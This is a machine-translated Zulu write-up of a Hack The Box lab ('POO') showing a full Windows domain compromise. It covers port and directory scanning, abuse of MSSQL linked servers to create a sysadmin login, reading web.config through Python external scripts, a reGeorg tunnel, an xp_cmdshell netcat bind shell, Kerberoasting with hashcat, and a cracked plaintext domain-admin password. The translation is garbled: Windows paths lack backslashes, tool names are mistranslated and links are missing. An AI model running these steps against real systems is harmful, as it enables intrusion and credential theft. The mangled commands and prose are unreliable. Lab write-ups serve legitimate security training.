Kulesi sihloko, sizohlaziya ukudlula hhayi nje komshini, kodwa nelabhorethri yonke encane evela kusayithi. .
Njengoba kushiwo encazelweni, i-POO yakhelwe ukuhlola amakhono kuzo zonke izigaba zokuhlasela endaweni encane yohlu lwemibhalo esebenzayo. Umgomo uwukufaka engozini umsingathi otholakalayo, ukukhulisa amalungelo, futhi ekugcineni konakalise sonke isizinda ngokuqoqa amafulegi angu-5 kule nqubo.
Uxhumano elabhorethri nge-VPN. Kunconywa ukuthi ungaxhumeki kukhompuyutha esebenzayo noma kumsingathi lapho kunedatha ebalulekile kuwe, njengoba ungena kunethiwekhi yangasese nabantu abazi okuthile mayelana nokuphepha kolwazi 🙂
ulwazi lwenhlangano
Ukuze ukwazi ukuthola mayelana nezihloko ezintsha, isofthiwe nolunye ulwazi, ngidale и endaweni ye-IIKB. Futhi izicelo zakho siqu, imibuzo, iziphakamiso kanye nezincomo .
Lonke ulwazi luhlinzekelwe ngezinjongo zemfundo kuphela. Umbhali walo mbhalo akathwesi icala nganoma yimuphi umonakalo odalwe kunoma ubani ngenxa yokusebenzisa ulwazi nezindlela ezitholwe ngenxa yokutadisha lo mbhalo.
Intro
Lo mdlalo wokugcina unemishini emibili futhi uqukethe amafulegi angu-5.
Incazelo kanye nekheli lomsingathi otholakalayo nakho kunikezwa.
Bona!
Recon ifulegi
Lo mshini unekheli le-IP elingu-10.13.38.11 engiyengeza kulo /etc/hosts.
10.13.38.11 poo.htb
Isinyathelo sokuqala ukuskena izimbobo ezivulekile. Njengoba kuthatha isikhathi eside ukuskena wonke amachweba nge-nmap, ngizoqale ngikwenze nge-mascan. Siskena zonke izimbobo ze-TCP ne-UDP kusukela kusixhumi esibonakalayo se-tun0 ku-500pps.
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
Manje, ukuze uthole ulwazi oluningiliziwe mayelana nezinsizakalo ezisebenza emachwebeni, ake sihlole ngenketho -A.
nmap -A poo.htb -p80,1433
Ngakho, sinezinsizakalo ze-IIS ne-MSSQL. Kulokhu, sizothola igama langempela le-DNS lesizinda nekhompyutha. Kuseva yewebhu, sibingelelwa yikhasi lasekhaya le-IIS.
Ake siphindaphinde phezu kwezinkomba. Ngisebenzisa i-gobuster kulokhu. Kumapharamitha sicacisa inombolo yokusakaza 128 (-t), URL (-u), isichazamazwi (-w) nezandiso esizithandayo (-x).
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
Ngakho, sinobuqiniso be-HTTP bomkhombandlela womqondisi, kanye nefayela lesitoreji sesevisi yedeskithophu ye-DS_Store etholakalayo. .DS_Store amafayela agcina izilungiselelo zomsebenzisi zefolda, njengohlu lwamafayela, indawo yesithonjana, isithombe sangemuva esikhethiwe. Ifayela elinjalo lingagcina lisohlwini lwemibhalo yeseva yewebhu yabathuthukisi bewebhu. Ngakho, sithola ulwazi mayelana nokuqukethwe lwemibhalo. Ukuze lokhu ungasebenzisa .
python3 dsstore_crawler.py -i http://poo.htb/
Sithola okuqukethwe ohlwini lwemibhalo. Into ethakazelisa kakhulu lapha yi-directory ye-dev, lapho singabona khona imithombo namafayela e-db emagatsheni amabili. Kodwa singasebenzisa izinhlamvu zokuqala ezingu-6 zamagama wefayela namagama ohla lwemibhalo uma isevisi isengozini ye-IIS ShortName. Ungahlola lobu bungozi usebenzisa .
Futhi sithola ifayela lombhalo elilodwa eliqala ngokuthi "poo_co". Ngingazi ukuthi ngenzeni ngokulandelayo, ngivele ngakhetha kusichazamazwi sezinkomba wonke amagama aqala ngokuthi "co".
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txtFuthi phinda nge-wfuzz.
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
Futhi thola igama elifanele! Sibheka leli fayela, silondoloza imininingwane (ngokubheka ipharamitha ye-DBNAME, zisuka ku-MSSQL).
Sinikeza ifulegi, futhi sithuthuka ngo-20%.
Huh ifulegi
Sixhuma ku-MSSQL, ngisebenzisa i-DBeaver.
Asitholi lutho oluthokozisayo kule database, ake sakhe i-SQL Editor futhi sihlole ukuthi abasebenzisi bayini.
SELECT name FROM master..syslogins;
Sinabasebenzisi ababili. Ake sihlole amalungelo ethu.
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
Ngakho, awekho amalungelo. Ake sibone amaseva axhunyiwe, ngibhale ngale nqubo ngokuningiliziwe .
SELECT * FROM master..sysservers;
Ngakho sithola enye i-SQL Server. Ake sihlole ukukhishwa kwemiyalo kule seva sisebenzisa i-openquery().
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
Futhi singakwazi ukwakha isihlahla sombuzo.
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');Iqiniso liwukuthi uma senza isicelo kuseva exhunyiwe, isicelo senziwa kumongo womunye umsebenzisi! Ake sibone ukuthi yimuphi umongo womsebenzisi esiwusebenzisayo kuseva exhunyiwe.
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
Futhi manje ake sibone ukuthi isicelo esivela kuseva exhunywe kwesethu senziwa kumuphi umongo!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
Ngakho-ke, kungumongo we-DBO okufanele ube nawo wonke amalungelo. Ake sihlole amalungelo uma kwenzeka kuba nesicelo esivela kuseva exhunyiwe.
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
Njengoba ubona, sinawo wonke amalungelo! Asidale kanje admin wethu. Kodwa abawavumeli ngokusebenzisa i-openquery, masikwenze nge-EXECUTE AT.
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";Futhi manje sixhuma nemininingwane yomsebenzisi omusha, bheka isizindalwazi esisha sefulegi.
Sinikeza leli fulegi futhi siqhubekele phambili.
Ifulegi le-backtrack
Masithole igobolondo sisebenzisa i-MSSQL, ngisebenzisa i-mssqlclient kusuka kuphakheji ye-impacket.
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
Sidinga ukuthola amagama ayimfihlo, futhi into yokuqala esesiyihlangabezile isayithi. Ngakho-ke, sidinga ukucushwa kweseva yewebhu (akunakwenzeka ukuphonsa igobolondo elilula, ngokusobala i-firewall iyasebenza).
Kodwa ukufinyelela kwenqatshiwe. Nakuba singakwazi ukufunda ifayela ku-MSSQL, sidinga nje ukwazi ukuthi yiziphi izilimi zokuhlela ezimisiwe. Futhi kumkhombandlela we-MSSQL sithola ukuthi kukhona iPython.
Khona-ke ayikho inkinga yokufunda ifayela le-web.config.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
Ngemininingwane etholakele, yiya ku-/admin bese uthatha ifulegi.
ifulegi eliphansi
Eqinisweni, kunokuthile okungahambi kahle ngokusebenzisa i-firewall, kodwa uma sibheka izilungiselelo zenethiwekhi, siqaphela ukuthi iphrothokholi ye-IPv6 nayo iyasetshenziswa!
Engeza leli kheli ku-/etc/hosts.
dead:babe::1001 poo6.htb
Ake siskene umsingathi futhi, kodwa kulokhu nge-IPv6.
Futhi isevisi ye-WinRM itholakala nge-IPv6. Ake sixhumane nemininingwane etholakele.
Kunefulegi kudeskithophu, linikeze.
Ifulegi le-P00ned
Ngemuva kokuthola ulwazi kumsingathi nge asitholi lutho olukhethekile. Kwabe sekunqunywa ukuthi kuphinde kubhekwe iziqinisekiso (nami ngabhala ngalesi sihloko ). Kodwa angikwazanga ukuthola wonke ama-SPN ohlelweni nge-WinRM.
setspn.exe -T intranet.poo -Q */*
Ake sikhiphe umyalo nge-MSSQL.
Ngale ndlela, sithola i-SPN yabasebenzisi i-p00_hr ne-p00_adm, okusho ukuthi basengozini yokuhlaselwa okufana ne-Kerberoasting. Ngamafuphi, singathola ama-hashes amaphasiwedi abo.
Okokuqala udinga ukuthola igobolondo elizinzile egameni lomsebenzisi we-MSSQL. Kodwa njengoba silinganiselwe ekufinyeleleni, sinokuxhumana nomsingathi kuphela ngamachweba angu-80 no-1433. Kodwa kungenzeka ukudonsa ithrafikhi nge-port 80! Kulokhu sisebenzisa . Masilayishe ifayela le-tunnel.aspx kumkhombandlela wasekhaya weseva yewebhu - C: inetpubwwwroot.
Kodwa uma sizama ukufinyelela kuyo, sithola iphutha 404. Lokhu kusho ukuthi *.aspx amafayela awenziwanga. Ukuze wenze amafayela analezi zandiso asebenze, faka i-ASP.NET 4.5 kanje.
dism /online /enable-feature /all /featurename:IIS-ASPNET45
Futhi manje, lapho sifinyelela ku-tunnel.aspx, sithola impendulo yokuthi yonke into isimi ngomumo.
Ake siqale ingxenye yeklayenti yohlelo lokusebenza, ezodlulisela ithrafikhi. Sizodlulisela wonke amathrafikhi kusuka ku-port 5432 kuya kuseva.
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
Futhi sisebenzisa ama-proxychains ukuthumela ithrafikhi yanoma yiluphi uhlelo lokusebenza ngommeleli wethu. Ake sengeze lo mmeleli kufayela lokucushwa /etc/proxychains.conf.
Manje ake silayishe uhlelo kuseva , esizokwenza ngalo igobolondo lokubopha elizinzile, kanye neskripthi , esizokwenza ngayo ukuhlasela kwe-Kerberoasting.
Manje, nge-MSSQL, sethula umlaleli.
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
Futhi sixhuma ngommeleli wethu.
proxychains rlwrap nc poo.htb 4321
Ake sithole ama-hashes.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
Okulandelayo, udinga ukuphindaphinda kulawa ma-hashi. Njengoba i-rockyou ingenaso isichazamazwi sedatha yephasiwedi, ngisebenzise ZONKE izichazamazwi zamagama ayimfihlo ezinikezwe ku-Seclists. Ukuze sibale sisebenzisa i-hashcat.
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --forceFuthi sithola womabili amagama ayimfihlo, elokuqala kusichazamazwi sesi-dutch_passwordlist.txt, kanti elesibili liku-Keyboard-Combinations.txt.
Futhi ngakho sinabasebenzisi abathathu, siya kusilawuli sesizinda. Ake sithole ikheli lakhe kuqala.
Kuhle, silifundile ikheli le-IP lesilawuli sesizinda. Ake sithole bonke abasebenzisi besizinda, nokuthi yimuphi kubo ongumlawuli. Ukulanda umbhalo ukuze uthole ulwazi PowerView.ps1. Ngemuva kwalokho sizoxhuma sisebenzisa ububi-winrm, sicacisa inkomba eneskripthi kupharamitha -s. Bese uvele ulayishe iskripthi se-PowerView.
Manje sesiyakwazi ukufinyelela yonke imisebenzi yayo. Umsebenzisi we-p00_adm ubukeka njengomsebenzisi onenhlanhla, ngakho-ke sizosebenza kumongo wawo. Masidale into ye-PSCredential yalo msebenzisi.
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$CpassManje yonke imiyalo ye-Powershell lapho sicacisa khona i-Creds izosetshenziswa esikhundleni sika-p00_adm. Masibonise uhlu lwabasebenzisi kanye nesibaluli se-AdminCount.
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
Ngakho-ke, umsebenzisi wethu unelungelo ngempela. Ake sibone ukuthi ukuliphi iqembu.
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
Ekugcineni siqinisekisa ukuthi umsebenzisi ungumqondisi wesizinda. Lokhu kuyinikeza ilungelo lokungena ngemvume ukude kusilawuli sesizinda. Ake sizame ukungena ngemvume ngeWinRM sisebenzisa umhubhe wethu. Ngididwe amaphutha akhishwe i-reGeorg uma usebenzisa i-bivil-winrm.
Bese sisebenzisa enye, elula, ukuze uxhume ku-WinRM. Vula futhi ushintshe amapharamitha wokuxhuma.
Sizama ukuxhuma, futhi sikuhlelo.
Kodwa alikho ifulege. Bese ubheka umsebenzisi bese ubheka amadeskithophu.
Ku-mr3ks sithola ifulegi futhi ilabhorethri isiqediwe ngo-100%.
Yilokho kuphela. Njengempendulo, phawula ukuthi ingabe ufunde okuthile okusha kulesi sihloko nokuthi kube usizo yini kuwe.
Ungasijoyina ku . Lapho ungathola izinto ezithakazelisayo, izifundo ezihlanganisiwe, kanye nesofthiwe. Masiqoqe umphakathi lapho kuzoba khona abantu abaqonda izindawo eziningi ze-IT, bese singakwazi njalo ukusizana kunoma iyiphi i-IT kanye nezindaba zokuphepha kolwazi.
Source: www.habr.com